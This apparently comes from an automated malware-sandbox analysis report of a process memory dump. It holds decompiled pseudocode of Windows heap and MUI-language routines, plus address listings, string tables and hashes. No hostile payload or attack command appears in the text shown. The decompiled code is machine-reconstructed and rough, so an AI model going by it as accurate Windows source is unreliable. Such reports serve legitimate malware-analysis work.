									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0166BB40(_t257,  &_v68, _t243);
								if(L016343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01671370(_t278, 0x1604e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01644620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0166F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01671370(_v16, 0x1604e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0166BB40(_t262,  &_v68, _t244);
								if(L016343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01671370(_t282, 0x1604e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0166BB40(_t262,  &_v68, _t201);
							if(L016343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01644620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0166F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01671370(_t280, 0x1604e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0166BB40(_t267,  &_v68, _t245);
							if(L016343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01671370(_t284, 0x1604e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0166BB40(_t267,  &_v68, _t224);
						if(L016343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                0x01633d3c
                                                                0x01633d42
                                                                0x01633d44
                                                                0x01633d46
                                                                0x01633d49
                                                                0x01633d4c
                                                                0x01633d4f
                                                                0x01633d52
                                                                0x01633d55
                                                                0x01633d58
                                                                0x01633d5b
                                                                0x01633d5f
                                                                0x01633d61
                                                                0x01633d66
                                                                0x01688213
                                                                0x01688218
                                                                0x01634085
                                                                0x01634088
                                                                0x0163408e
                                                                0x01634094
                                                                0x0163409a
                                                                0x016340a0
                                                                0x016340a6
                                                                0x016340a9
                                                                0x016340af
                                                                0x016340b6
                                                                0x016340bd
                                                                0x016340bd
                                                                0x01633d83
                                                                0x0168821f
                                                                0x01688229
                                                                0x01688238
                                                                0x01688238
                                                                0x0168823d
                                                                0x0168823d
                                                                0x01633da0
                                                                0x01633daf
                                                                0x01633db5
                                                                0x01633dba
                                                                0x01633dba
                                                                0x01633dd4
                                                                0x01633e94
                                                                0x01633eab
                                                                0x01633f6d
                                                                0x01633f84
                                                                0x0163406b
                                                                0x0163406b
                                                                0x0163406e
                                                                0x0163406e
                                                                0x01634070
                                                                0x01634074
                                                                0x01688351
                                                                0x01688351
                                                                0x0163407a
                                                                0x0163407f
                                                                0x0168835d
                                                                0x01688370
                                                                0x01688377
                                                                0x01688379
                                                                0x0168837c
                                                                0x0168837c
                                                                0x0168835d
                                                                0x00000000
                                                                0x0163407f
                                                                0x01633f8a
                                                                0x01633f8d
                                                                0x01633f90
                                                                0x01633f95
                                                                0x0168830d
                                                                0x0168830f
                                                                0x01633f9b
                                                                0x01633fac
                                                                0x01633fae
                                                                0x01633fb1
                                                                0x01633fb1
                                                                0x01633fb6
                                                                0x01688317
                                                                0x0168831a
                                                                0x00000000
                                                                0x01633fbc
                                                                0x01633fc1
                                                                0x01633fc9
                                                                0x01633fd7
                                                                0x01633fda
                                                                0x01633fdd
                                                                0x01634021
                                                                0x01634021
                                                                0x01634029
                                                                0x01634030
                                                                0x01634044
                                                                0x01634046
                                                                0x01634046
                                                                0x01634044
                                                                0x01634049
                                                                0x01688327
                                                                0x01688334
                                                                0x01688339
                                                                0x0168833c
                                                                0x0163404f
                                                                0x0163404f
                                                                0x0163404f
                                                                0x01634051
                                                                0x01634056
                                                                0x01634063
                                                                0x01634063
                                                                0x01634068
                                                                0x00000000
                                                                0x01634068
                                                                0x01633fdf
                                                                0x01633fe2
                                                                0x01633fe4
                                                                0x01633fe7
                                                                0x01633fef
                                                                0x01634003
                                                                0x01634005
                                                                0x01634005
                                                                0x0163400c
                                                                0x01634013
                                                                0x01634016
                                                                0x01634017
                                                                0x0163401b
                                                                0x0163401e
                                                                0x00000000
                                                                0x0163401e
                                                                0x01633fb6
                                                                0x01633eb1
                                                                0x01633eb4
                                                                0x01633eb7
                                                                0x01633ebc
                                                                0x016882a9
                                                                0x016882ab
                                                                0x01633ec2
                                                                0x01633ed3
                                                                0x01633ed5
                                                                0x01633ed8
                                                                0x01633ed8
                                                                0x01633edd
                                                                0x016882b3
                                                                0x016882b6
                                                                0x00000000
                                                                0x01633ee3
                                                                0x01633ee8
                                                                0x01633eed
                                                                0x01633ef0
                                                                0x01633ef3
                                                                0x01633f02
                                                                0x01633f05
                                                                0x01633f08
                                                                0x016882c0
                                                                0x016882c3
                                                                0x016882c5
                                                                0x016882c8
                                                                0x016882d0
                                                                0x016882e4
                                                                0x016882e6
                                                                0x016882e6
                                                                0x016882ed
                                                                0x016882f4
                                                                0x016882f7
                                                                0x016882f8
                                                                0x016882fc
                                                                0x016882ff
                                                                0x016882ff
                                                                0x01633f0e
                                                                0x01633f11
                                                                0x01633f16
                                                                0x01633f1d
                                                                0x01633f31
                                                                0x01688307
                                                                0x01688307
                                                                0x01633f31
                                                                0x01633f39
                                                                0x01633f48
                                                                0x01633f4d
                                                                0x01633f50
                                                                0x01633f50
                                                                0x01633f53
                                                                0x01633f58
                                                                0x01633f65
                                                                0x01633f65
                                                                0x01633f6a
                                                                0x00000000
                                                                0x01633f6a
                                                                0x01633edd
                                                                0x01633dda
                                                                0x01633ddd
                                                                0x01633de0
                                                                0x01633de5
                                                                0x01688245
                                                                0x01633deb
                                                                0x01633df7
                                                                0x01633dfc
                                                                0x01633dfe
                                                                0x01633e01
                                                                0x01633e01
                                                                0x01633e06
                                                                0x0168824d
                                                                0x0168824f
                                                                0x01688254
                                                                0x00000000
                                                                0x01633e0c
                                                                0x01633e11
                                                                0x01633e16
                                                                0x01633e19
                                                                0x01633e29
                                                                0x01633e2c
                                                                0x01633e2f
                                                                0x0168825c
                                                                0x0168825f
                                                                0x01688261
                                                                0x01688264
                                                                0x0168826c
                                                                0x01688280
                                                                0x01688282
                                                                0x01688282
                                                                0x01688289
                                                                0x01688290
                                                                0x01688293
                                                                0x01688294
                                                                0x01688298
                                                                0x0168829b
                                                                0x0168829b
                                                                0x01633e35
                                                                0x01633e38
                                                                0x01633e3d
                                                                0x01633e44
                                                                0x01633e58
                                                                0x016882a3
                                                                0x016882a3
                                                                0x01633e58
                                                                0x01633e60
                                                                0x01633e6f
                                                                0x01633e74
                                                                0x01633e77
                                                                0x01633e77
                                                                0x01633e7a
                                                                0x01633e7f
                                                                0x01633e8c
                                                                0x01633e8c
                                                                0x01633e91
                                                                0x00000000
                                                                0x01633e91

                                                                Strings
                                                                • Kernel-MUI-Language-Allowed, xrefs: 01633DC0
                                                                • WindowsExcludedProcs, xrefs: 01633D6F
                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01633E97
                                                                • Kernel-MUI-Language-SKU, xrefs: 01633F70
                                                                • Kernel-MUI-Number-Allowed, xrefs: 01633D8C
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                • API String ID: 0-258546922
                                                                • Opcode ID: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                                                                • Instruction ID: 84063ce7a656c5c34615c87a0e3f82173667e252c1451ddaf401c219e724ee58
                                                                • Opcode Fuzzy Hash: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                                                                • Instruction Fuzzy Hash: EBF13A72D00619EBCB16DF98CD80AEEBBBEFF58650F14416AE505A7350DB349E01CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016240E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 29%
                                                                			E016240E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0162B150(", passed to %s", _t29);
					}
					_push("\n");
					E0162B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1716378 = 1;
						asm("int3");
						 *0x1716378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                0x016240e6
                                                                0x016240e8
                                                                0x016240f1
                                                                0x0168042d
                                                                0x0168044c
                                                                0x01680451
                                                                0x0168042f
                                                                0x01680444
                                                                0x01680449
                                                                0x0168045d
                                                                0x01680466
                                                                0x0168046e
                                                                0x01680474
                                                                0x01680475
                                                                0x0168047a
                                                                0x0168048a
                                                                0x0168048c
                                                                0x01680493
                                                                0x01680494
                                                                0x01680494
                                                                0x00000000
                                                                0x0168049b
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                • API String ID: 0-188067316
                                                                • Opcode ID: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                                                                • Instruction ID: f1d267a009c9c3ff19f9290a593ceee4999fb9d7bc8278f5f3e1f401d788f02e
                                                                • Opcode Fuzzy Hash: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                                                                • Instruction Fuzzy Hash: D7014C32142A51EED32AA76DEC0DF537BA4DB01B31F29842DF00547781CBE49494C728
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 70%
                                                                			E0164A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1718748 - 1;
					if( *0x1718748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
									_t260 = _t257 + 4;
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0162B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1717bc8;
								if(__eflags == 0) {
									E016E2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E016EA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0167D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0164AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E016EA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E016EA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1718748 - 1;
					if( *0x1718748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0162B150();
							__eflags =  *0x1717bc8;
							if(__eflags == 0) {
								_t131 = E016E2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                0x0164a83a
                                                                0x0164a83c
                                                                0x0164a83e
                                                                0x0164a841
                                                                0x0164a844
                                                                0x0164a84a
                                                                0x0164aa53
                                                                0x0164aa59
                                                                0x0164aa59
                                                                0x0164a858
                                                                0x0164a85e
                                                                0x0164aaf5
                                                                0x0164aafc
                                                                0x0169229e
                                                                0x016922a2
                                                                0x016922a8
                                                                0x016922b3
                                                                0x016922b5
                                                                0x016922bb
                                                                0x016922c1
                                                                0x016922c5
                                                                0x016922e6
                                                                0x016922eb
                                                                0x016922f0
                                                                0x016922c7
                                                                0x016922dc
                                                                0x016922e1
                                                                0x016922e1
                                                                0x016922f3
                                                                0x016922f8
                                                                0x016922fd
                                                                0x01692300
                                                                0x01692307
                                                                0x0169230e
                                                                0x0169230e
                                                                0x01692313
                                                                0x01692313
                                                                0x016922b5
                                                                0x016922a2
                                                                0x0164aafc
                                                                0x0164a864
                                                                0x0164a869
                                                                0x0164aa5c
                                                                0x0164aa5e
                                                                0x0164a86f
                                                                0x0164a87f
                                                                0x0164a885
                                                                0x0164a885
                                                                0x0164a88b
                                                                0x0164a890
                                                                0x0164a896
                                                                0x0164ab0c
                                                                0x0164ab0f
                                                                0x0164ab15
                                                                0x01692320
                                                                0x01692320
                                                                0x0164ab1b
                                                                0x0164a89c
                                                                0x0164a89f
                                                                0x0164a8a2
                                                                0x0164a8a2
                                                                0x0164a8a5
                                                                0x0164a8af
                                                                0x0164a8b3
                                                                0x0164a8b8
                                                                0x0164aa66
                                                                0x0164a8be
                                                                0x0164a8c5
                                                                0x0164a8c6
                                                                0x0164a8ce
                                                                0x01692328
                                                                0x01692332
                                                                0x01692337
                                                                0x01692337
                                                                0x0164a8ce
                                                                0x0164a8d4
                                                                0x0164a8d8
                                                                0x0164a8db
                                                                0x0164a8de
                                                                0x0164a8e1
                                                                0x0164a8e5
                                                                0x0164a8e8
                                                                0x0164a8f0
                                                                0x0164a8f3
                                                                0x0169234c
                                                                0x01692350
                                                                0x01692355
                                                                0x01692359
                                                                0x01692359
                                                                0x0164a8f9
                                                                0x0164a901
                                                                0x0164aae4
                                                                0x0164aae4
                                                                0x0164aaea
                                                                0x00000000
                                                                0x0164a907
                                                                0x0164a90a
                                                                0x0164a91d
                                                                0x0164a91d
                                                                0x00000000
                                                                0x0164a910
                                                                0x0164a910
                                                                0x0164a910
                                                                0x0164a914
                                                                0x0164a924
                                                                0x0164a924
                                                                0x0164a924
                                                                0x0164a924
                                                                0x0164a916
                                                                0x0164a91b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a91b
                                                                0x0164a925
                                                                0x0164a925
                                                                0x0164a932
                                                                0x0164a936
                                                                0x0164a93c
                                                                0x0164a93c
                                                                0x0164a93c
                                                                0x0164ab22
                                                                0x0164ab24
                                                                0x0164ab27
                                                                0x0164ab27
                                                                0x0164a942
                                                                0x0164a944
                                                                0x0164aaba
                                                                0x0164aabd
                                                                0x0164aac0
                                                                0x0164aac0
                                                                0x0164aac2
                                                                0x0164ab2f
                                                                0x0164aac4
                                                                0x0164aac4
                                                                0x0164aac7
                                                                0x0164aaca
                                                                0x0164aacc
                                                                0x0164aace
                                                                0x0164aace
                                                                0x0164aace
                                                                0x0164aad1
                                                                0x0164aad1
                                                                0x0164aad7
                                                                0x0164aad9
                                                                0x00000000
                                                                0x00000000
                                                                0x01692361
                                                                0x01692369
                                                                0x0169236b
                                                                0x00000000
                                                                0x01692371
                                                                0x00000000
                                                                0x01692371
                                                                0x00000000
                                                                0x0169236b
                                                                0x0164aac0
                                                                0x0164a94a
                                                                0x0164a94a
                                                                0x0164a94d
                                                                0x0164a94d
                                                                0x0164a950
                                                                0x0164a954
                                                                0x01692376
                                                                0x01692380
                                                                0x0164a95a
                                                                0x0164a95a
                                                                0x0164a95c
                                                                0x0164a95f
                                                                0x0164a961
                                                                0x0164a961
                                                                0x0164a967
                                                                0x0164a96a
                                                                0x0164a972
                                                                0x0164aa02
                                                                0x0164aa06
                                                                0x0164aa10
                                                                0x0164aa16
                                                                0x0164aa16
                                                                0x0164aa1b
                                                                0x0164aa21
                                                                0x0164aa24
                                                                0x0164aa27
                                                                0x0164aa29
                                                                0x0164aa2c
                                                                0x0164aa32
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a978
                                                                0x0164a978
                                                                0x0164a97b
                                                                0x0164a981
                                                                0x0164a996
                                                                0x0164a998
                                                                0x0164a99f
                                                                0x0164a9a2
                                                                0x0169238a
                                                                0x0164a9a8
                                                                0x0164a9a8
                                                                0x0164a9a8
                                                                0x0164a9aa
                                                                0x0164a9ad
                                                                0x0164a9b0
                                                                0x0164a9bb
                                                                0x0164a9be
                                                                0x0164a9c7
                                                                0x0164a9c9
                                                                0x0164a9c9
                                                                0x0164a9cc
                                                                0x0164a9d1
                                                                0x0164aa6d
                                                                0x0164aa70
                                                                0x0164aa73
                                                                0x0164aa75
                                                                0x0164aa79
                                                                0x0164aa7e
                                                                0x0164aa82
                                                                0x0164aa8f
                                                                0x0164aa94
                                                                0x0164aa96
                                                                0x01692392
                                                                0x016923a1
                                                                0x016923a1
                                                                0x0164aa9c
                                                                0x0164aa9f
                                                                0x0164aaa2
                                                                0x0164aaa2
                                                                0x0164aaa8
                                                                0x0164aaab
                                                                0x0164aaaf
                                                                0x00000000
                                                                0x0164aab5
                                                                0x00000000
                                                                0x0164aab5
                                                                0x0164a9d7
                                                                0x0164a9d7
                                                                0x0164a9da
                                                                0x0164a9e0
                                                                0x0164a9e3
                                                                0x0164a9e6
                                                                0x0164a9e9
                                                                0x0164a9eb
                                                                0x0164a9fd
                                                                0x0164a9fd
                                                                0x00000000
                                                                0x0164a9eb
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a983
                                                                0x0164a983
                                                                0x0164a983
                                                                0x0164a987
                                                                0x0164a995
                                                                0x0164a995
                                                                0x0164a995
                                                                0x0164a995
                                                                0x0164a989
                                                                0x0164a98e
                                                                0x00000000
                                                                0x0164a990
                                                                0x00000000
                                                                0x0164a990
                                                                0x0164a98e
                                                                0x00000000
                                                                0x0164a983
                                                                0x0164a972
                                                                0x0164a90a
                                                                0x0164aa34
                                                                0x0164aa34
                                                                0x0164aa40
                                                                0x0164aa43
                                                                0x0164aa46
                                                                0x0164aa4d
                                                                0x016923ab
                                                                0x016923b2
                                                                0x016923b8
                                                                0x016923be
                                                                0x016923c3
                                                                0x016923c5
                                                                0x016923cb
                                                                0x016923d1
                                                                0x016923d5
                                                                0x016923f6
                                                                0x016923fb
                                                                0x016923d7
                                                                0x016923ec
                                                                0x016923f1
                                                                0x01692403
                                                                0x01692408
                                                                0x01692410
                                                                0x01692417
